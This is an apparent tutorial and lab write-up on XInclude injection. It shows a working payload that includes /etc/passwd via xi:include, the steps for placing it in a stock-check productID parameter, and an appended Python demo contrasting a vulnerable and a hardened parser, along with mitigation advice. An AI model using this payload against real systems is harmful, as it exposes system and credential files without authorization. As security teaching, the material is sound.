XInclude Attacks


Last updated 2 years ago

Some applications take client-submitted data, embed it server-side into an XML document, and then parse that document.

  • A common case is client-submitted data that is placed into a back-end SOAP request, which is then processed by the back-end SOAP service.

In such a scenario a classic XXE attack is not possible, because:

  • We don't control the entire XML document, so we cannot define a DOCTYPE element and therefore cannot declare any entities.

  • What we can do instead is use XInclude, which needs no DOCTYPE at all.

XInclude (XML Inclusions) is a W3C specification that allows an XML document to be built from sub-documents.

An XInclude directive can be placed within any data value in an XML document, so the attack works in situations where we only control a single item of data that is placed into a server-side XML document, provided the server's parser is XInclude-aware.

<d0p xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></d0p>

We need to declare the XInclude namespace on a wrapper element and provide the path to the sensitive file in href. parse="text" matters: /etc/passwd is not well-formed XML, so without it the parser would reject the included file and nothing would come back.

PortSwigger Exercises

This attack can be confusing and hard to detect, because the request we send does not contain any XML at all: the data is only wrapped into an XML document on the server side, so nothing in the request hints at an XML parser.

In the lab we only get two parameters, productID and storeID, both set to 1. The productID parameter is the natural candidate, since the stock check is performed for the product.

When we insert the above payload into the productID parameter, the contents of /etc/passwd come back inside an error message. The payload does two things:

  • It declares the XInclude namespace => http://www.w3.org/2001/XInclude

  • It includes /etc/passwd as text via xi:include with parse="text"
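The following Python example is added here and is not code from the original page or from the PortSwigger lab. It models both the payload section above and the lab walkthrough: a back end that pastes a client-supplied productID into a server-side XML document and then resolves XInclude, next to the hardened variant that leaves xi:include inert. Python's standard library only resolves XInclude when the application explicitly calls xml.etree.ElementInclude.include, so the vulnerable path is modelled deliberately; the stockCheck/productId wrapper document, the file:// loader (mimicking what an XInclude-aware parser such as Java's DocumentBuilderFactory with setXIncludeAware(true) or libxml2 with XML_PARSE_XINCLUDE does), and the secret file standing in for /etc/passwd are all assumptions constructed for the demo.

```python
"""Added example (not from the original page): a stand-in for a back end that
pastes a client-supplied productID into a server-side XML document and then
resolves XInclude, next to the hardened variant that leaves xi:include inert."""
import os
import tempfile
import xml.etree.ElementTree as ET
import xml.etree.ElementInclude as EI
from urllib.parse import unquote, urlencode, urlparse

XI_NS = "http://www.w3.org/2001/XInclude"

# Constructed stand-in for /etc/passwd so the demo never reads a real system file.
SECRET_FILE = os.path.join(tempfile.mkdtemp(), "passwd")
with open(SECRET_FILE, "w", encoding="utf-8") as fh:
    fh.write("root:x:0:0:root:/root:/bin/bash\n")


def xinclude_payload(path: str) -> str:
    """The page's payload: declare the XInclude namespace on a wrapper element
    and include `path` as text (parse="text", because /etc/passwd is not XML)."""
    return (f'<d0p xmlns:xi="{XI_NS}">'
            f'<xi:include parse="text" href="file://{path}"/></d0p>')


def form_body(product_id: str, store_id: str) -> str:
    """The stock-check POST body once the payload is URL-encoded into the
    productID parameter (parameter names taken from the page)."""
    return urlencode({"productID": product_id, "storeID": store_id})


def build_stock_request(product_id: str, store_id: str) -> str:
    """Hypothetical server-side template (the lab's real back-end schema is not
    shown on the page): the client value is pasted into an existing document,
    so the attacker cannot add a DOCTYPE and therefore cannot declare entities."""
    return ('<?xml version="1.0" encoding="UTF-8"?>'
            '<stockCheck>'
            f'<productId>{product_id}</productId>'
            f'<storeId>{store_id}</storeId>'
            '</stockCheck>')


def file_uri_loader(href: str, parse: str, encoding=None):
    """Resolve file:// URIs the way an XInclude-aware parser does (Java with
    setXIncludeAware(true), libxml2 with XML_PARSE_XINCLUDE). Python's stdlib
    loader only accepts bare paths, so the URI is mapped to a path first."""
    if href.startswith("file://"):
        href = unquote(urlparse(href).path)
    return EI.default_loader(href, parse, encoding)


def extract_product_id(xml_text: str, resolve_xinclude: bool) -> str:
    """Parse the back-end document and return the productId text it would act on.

    resolve_xinclude=True  -> VULNERABLE: xi:include is expanded from disk.
    resolve_xinclude=False -> HARDENED: xi:include stays an ordinary, inert element,
                              which is what an unmodified ElementTree parse does.
    """
    root = ET.fromstring(xml_text)
    if resolve_xinclude:
        EI.include(root, loader=file_uri_loader)
    return "".join(root.find("productId").itertext())


if __name__ == "__main__":
    evil = xinclude_payload(SECRET_FILE)
    print("POST body:", form_body(evil, "1"))
    doc = build_stock_request(evil, "1")
    print("vulnerable parser sees:", repr(extract_product_id(doc, True)))
    print("hardened parser sees:  ", repr(extract_product_id(doc, False)))
```

Run as a script: the vulnerable path returns the stand-in passwd line as the productId value (which is exactly what leaks into the lab's error message), while the hardened path returns an empty string because xi:include was never expanded. The practical fix is on the parser side: do not enable XInclude processing for documents that carry untrusted data (Java's DocumentBuilderFactory leaves setXIncludeAware off by default, and libxml2 only resolves includes when XML_PARSE_XINCLUDE is requested).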